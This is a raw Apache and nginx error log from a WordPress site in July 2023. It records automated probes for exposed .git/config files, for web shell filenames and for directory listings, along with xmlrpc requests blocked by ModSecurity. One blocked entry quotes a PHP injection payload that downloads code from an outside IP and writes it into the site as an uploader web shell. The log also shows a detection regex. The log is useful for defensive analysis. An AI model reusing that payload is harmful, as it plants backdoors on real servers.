*537133 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /old-cuburn/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537134 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /api/v4/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537136 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /wiki/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537135 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /qa/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537132 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /common/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537137 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /media../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537138 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537139 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /shop/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537140 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /test/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537141 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /git/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537142 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /application/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537143 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /web/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537144 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /js../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537145 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /images../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537147 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /m/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537148 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /v2/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537146 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /content../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537149 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537150 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /lib../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537151 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537153 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /static../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537152 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537154 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /wp-includes/js/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537155 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /beta/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537156 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /user/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537157 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/20 07:21:15 [error] 22308#22308: *537158 access forbidden by rule, client: 3.15.156.48, server: mail.investigacionperu.com, request: "GET /staging/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Jul 20 07:59:04.758381 2023] [autoindex:error] [pid 22562:tid 139856399292160] [client 4.150.12.87:42560] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Jul 20 14:51:31.738594 2023] [:error] [pid 22562:tid 139856265008896] [client 41.216.188.147:33362] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php, referer: www.google.com [Thu Jul 20 14:52:34.368203 2023] [:error] [pid 22562:tid 139856399292160] [client 41.216.188.147:33464] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php, referer: www.google.com [Thu Jul 20 14:53:03.283035 2023] [:error] [pid 22352:tid 139856348935936] [client 41.216.188.147:33496] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/my1.php, referer: www.google.com [Thu Jul 20 14:53:14.964312 2023] [:error] [pid 22350:tid 139856514541312] [client 41.216.188.147:33504] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/my1.php, referer: www.google.com [Thu Jul 20 14:53:41.631039 2023] [autoindex:error] [pid 22352:tid 139856248223488] [client 41.216.188.147:33544] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Thu Jul 20 14:53:49.280203 2023] [autoindex:error] [pid 22351:tid 139856306972416] [client 41.216.188.147:33556] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Thu Jul 20 14:54:16.181293 2023] [:error] [pid 22350:tid 139856265008896] [client 41.216.188.147:33576] PHP Fatal error: Uncaught Error: Call to undefined function load_textdomain() in /home/investig/public_html/wp-admin/includes/admin.php:16, referer: www.google.com [Thu Jul 20 14:54:16.181380 2023] [:error] [pid 22350:tid 139856265008896] [client 41.216.188.147:33576] Stack trace:, referer: www.google.com [Thu Jul 20 14:54:16.181396 2023] [:error] [pid 22350:tid 139856265008896] [client 41.216.188.147:33576] #0 {main}, referer: www.google.com [Thu Jul 20 14:54:16.181470 2023] [:error] [pid 22350:tid 139856265008896] [client 41.216.188.147:33576] thrown in /home/investig/public_html/wp-admin/includes/admin.php on line 16, referer: www.google.com [Thu Jul 20 14:54:40.367290 2023] [:error] [pid 22352:tid 139856306972416] [client 41.216.188.147:33606] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php, referer: www.google.com 2023/07/21 03:13:53 [error] 22307#22307: *592825 access forbidden by rule, client: 15.237.143.252, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jul 21 03:41:30.604433 2023] [ssl:warn] [pid 4338:tid 140344593213312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 03:41:34.950113 2023] [ssl:warn] [pid 4339:tid 140344593213312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 03:41:38.810129 2023] [ssl:warn] [pid 4339:tid 140344593213312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 03:41:42.311798 2023] [ssl:warn] [pid 4339:tid 140344593213312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 03:41:46.694640 2023] [ssl:warn] [pid 4865:tid 139742275737472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 03:41:51.135671 2023] [ssl:warn] [pid 4869:tid 139742275737472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 18:18:28.993834 2023] [ssl:warn] [pid 4869:tid 139742275737472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 18:20:50.762271 2023] [ssl:warn] [pid 4869:tid 139742275737472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 19:36:01.452477 2023] [ssl:warn] [pid 4869:tid 139742275737472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 19:36:34.152815 2023] [ssl:warn] [pid 4869:tid 139742275737472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 21 23:40:16.098669 2023] [autoindex:error] [pid 14939:tid 139742092994304] [client 20.189.78.78:60314] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jul 22 03:25:25.328063 2023] [ssl:warn] [pid 6585:tid 139979572664192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 22 03:25:27.796058 2023] [ssl:warn] [pid 6587:tid 139979572664192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 22 03:25:28.161096 2023] [ssl:warn] [pid 6587:tid 139979572664192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 22 03:25:29.748040 2023] [ssl:warn] [pid 6587:tid 139979572664192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 22 03:25:32.024250 2023] [ssl:warn] [pid 7099:tid 140079065323392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 22 03:25:34.239550 2023] [ssl:warn] [pid 7100:tid 140079065323392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 22 21:53:04.316511 2023] [autoindex:error] [pid 7571:tid 140078814852864] [client 20.163.11.24:37352] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jul 23 03:30:33.237356 2023] [ssl:warn] [pid 23479:tid 139906331457408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 23 03:30:37.721973 2023] [ssl:warn] [pid 23480:tid 139906331457408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 23 03:30:39.478939 2023] [ssl:warn] [pid 23480:tid 139906331457408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 23 03:30:41.459962 2023] [ssl:warn] [pid 23480:tid 139906331457408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 23 03:30:43.714673 2023] [ssl:warn] [pid 23926:tid 139818670655360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 23 03:30:48.165126 2023] [ssl:warn] [pid 23927:tid 139818670655360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 23 07:18:12.218356 2023] [autoindex:error] [pid 23947:tid 139818356958976] [client 103.252.116.90:54000] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jul 23 11:56:50.639988 2023] [autoindex:error] [pid 24043:tid 139818231068416] [client 20.189.78.78:47640] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sun Jul 23 15:02:28.465142 2023] [autoindex:error] [pid 24043:tid 139818356958976] [client 20.7.75.249:33690] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jul 23 23:59:56.212221 2023] [autoindex:error] [pid 24043:tid 139818222675712] [client 13.84.210.42:51630] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jul 24 03:49:23.213331 2023] [ssl:warn] [pid 28682:tid 140316831598464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 24 03:49:29.551352 2023] [ssl:warn] [pid 28684:tid 140316831598464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 24 03:49:30.988347 2023] [ssl:warn] [pid 28684:tid 140316831598464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 24 03:49:32.646049 2023] [ssl:warn] [pid 28684:tid 140316831598464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 24 03:49:36.313461 2023] [ssl:warn] [pid 29160:tid 140264266917760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 24 03:49:40.699328 2023] [ssl:warn] [pid 29163:tid 140264266917760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 24 18:01:17.460012 2023] [autoindex:error] [pid 29184:tid 140263884281600] [client 20.10.207.12:50044] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jul 25 03:46:24.513808 2023] [ssl:warn] [pid 4771:tid 140450964088704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 25 03:46:28.853181 2023] [ssl:warn] [pid 4772:tid 140450964088704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 25 03:46:29.423138 2023] [ssl:warn] [pid 4772:tid 140450964088704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 25 03:46:31.380270 2023] [ssl:warn] [pid 4772:tid 140450964088704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 25 03:46:35.406667 2023] [ssl:warn] [pid 5309:tid 139656070952832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 25 03:46:39.661877 2023] [ssl:warn] [pid 5311:tid 139656070952832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 25 16:06:33.206749 2023] [ssl:warn] [pid 5311:tid 139656070952832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 25 16:44:50.532640 2023] [ssl:warn] [pid 5311:tid 139656070952832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 25 19:04:05.344360 2023] [ssl:warn] [pid 5311:tid 139656070952832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 25 23:43:56.194262 2023] [:error] [pid 22158:tid 139655701825280] [client 104.210.220.181:37850] [client 104.210.220.181] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZMCkjCMYG_Gp4mUZCa-yEAAAAE4"], referer: www.google.com [Wed Jul 26 02:54:41.435052 2023] [autoindex:error] [pid 22157:tid 139655743788800] [client 4.151.50.67:53900] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Jul 26 02:54:44.073248 2023] [autoindex:error] [pid 22158:tid 139655760574208] [client 4.151.50.67:53906] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Jul 26 03:51:28.082753 2023] [ssl:warn] [pid 5789:tid 139775715870592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 26 03:51:32.426923 2023] [ssl:warn] [pid 5797:tid 139775715870592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 26 03:51:32.966558 2023] [ssl:warn] [pid 5797:tid 139775715870592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 26 03:51:34.881807 2023] [ssl:warn] [pid 5797:tid 139775715870592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 26 03:51:37.470046 2023] [ssl:warn] [pid 6273:tid 139975024625536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 26 03:51:41.842270 2023] [ssl:warn] [pid 6277:tid 139975024625536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 26 10:20:11.413554 2023] [autoindex:error] [pid 6303:tid 139974661863168] [client 20.10.199.198:36978] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jul 26 19:57:08.801623 2023] [autoindex:error] [pid 6510:tid 139974729004800] [client 20.10.206.154:34138] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jul 27 01:29:15.808291 2023] [ssl:warn] [pid 6277:tid 139975024625536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 27 02:18:00.664028 2023] [autoindex:error] [pid 18259:tid 139974816704256] [client 20.77.3.144:33342] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jul 27 03:24:19.633243 2023] [ssl:warn] [pid 28964:tid 140653183555456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 27 03:24:24.053068 2023] [ssl:warn] [pid 28966:tid 140653183555456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 27 03:24:27.111529 2023] [ssl:warn] [pid 28966:tid 140653183555456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 27 03:24:30.032040 2023] [ssl:warn] [pid 28966:tid 140653183555456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 27 03:24:33.790783 2023] [ssl:warn] [pid 29484:tid 140425199945600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 27 03:24:40.358232 2023] [ssl:warn] [pid 29487:tid 140425199945600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 27 12:44:24.438842 2023] [autoindex:error] [pid 29619:tid 140424777766656] [client 20.10.199.224:48088] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jul 27 18:45:28.414064 2023] [autoindex:error] [pid 29619:tid 140424760981248] [client 172.177.148.185:48458] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jul 28 03:15:49.370245 2023] [ssl:warn] [pid 12805:tid 139784186042240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 28 03:15:53.862273 2023] [ssl:warn] [pid 12807:tid 139784186042240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 28 03:15:54.196418 2023] [ssl:warn] [pid 12807:tid 139784186042240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 28 03:15:56.959181 2023] [ssl:warn] [pid 12807:tid 139784186042240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 28 03:16:00.539913 2023] [ssl:warn] [pid 13339:tid 140534962550656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 28 03:16:09.141206 2023] [ssl:warn] [pid 13341:tid 140534962550656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 28 11:36:44.980332 2023] [autoindex:error] [pid 13461:tid 140534567868160] [client 192.185.82.134:46686] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/sitemaps/index.php [Fri Jul 28 18:49:39.944831 2023] [autoindex:error] [pid 13368:tid 140534576260864] [client 20.10.206.216:47988] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 29 00:33:11.963120 2023] [:error] [pid 13366:tid 140534618224384] [client 5.188.62.26:44470] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZMSkl0iMFToQkhL_n-3CxgAAAAs"] [Sat Jul 29 00:33:15.162525 2023] [:error] [pid 13368:tid 140534771414784] [client 180.190.44.237:44474] [client 180.190.44.237] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZMSkm4XKtUYwaxXp8P8iqAAAAIE"] 